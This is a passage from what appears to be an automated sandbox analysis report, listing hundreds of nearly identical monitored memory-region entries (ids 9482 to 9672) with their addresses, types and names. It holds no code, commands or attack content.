"pagefile_0x0000000000610000" filename = "" Region: id = 9482 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9483 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9484 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9485 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9486 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9487 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9488 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9489 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9490 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9491 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9492 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9493 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9494 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9495 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9496 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9497 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9498 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9499 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9500 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9501 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9502 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9503 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9504 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9505 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9506 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9507 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9508 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9509 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9510 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9511 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9512 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9513 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9514 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9515 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9516 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9517 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9518 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9519 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9520 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9521 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9522 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9523 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9524 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9525 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9526 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9527 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9528 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9529 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9530 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9531 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9532 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9533 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9534 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 9535 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9536 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9537 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9538 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9539 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9540 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9541 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9542 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9543 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9544 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9545 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9546 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9547 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9548 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9549 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9550 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9551 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9552 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9553 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9554 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9555 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9556 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9557 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9558 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9559 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9560 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9561 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9562 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9563 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9564 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9565 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9566 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9567 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9568 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9569 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9570 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9571 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9572 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9573 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9574 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9575 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9576 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9577 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9578 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9579 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9580 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9581 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9582 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9583 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9584 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9585 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9586 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9587 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9588 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9589 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9590 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9591 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9592 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9593 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9594 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9595 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9596 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9597 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9598 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9599 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9600 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9601 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9602 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9603 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9604 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9605 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9606 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9607 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9608 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9609 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9610 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9611 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9612 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9613 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9614 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9615 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9616 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9617 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9618 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9619 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9620 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9621 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9622 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9623 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9624 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9625 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9626 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9627 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9628 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9629 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9630 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9631 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9632 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9633 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9634 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9635 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9636 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9637 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9638 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9639 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9640 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9641 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9642 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9643 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9644 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9645 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9646 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9647 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9648 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9649 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9650 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9651 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9652 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9653 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9654 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9655 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9656 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9657 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9658 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9659 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9660 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9661 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9662 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9663 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9664 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9665 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9666 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9667 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9668 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9669 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9670 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9671 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9672 start_va = 0x610000 end_va = 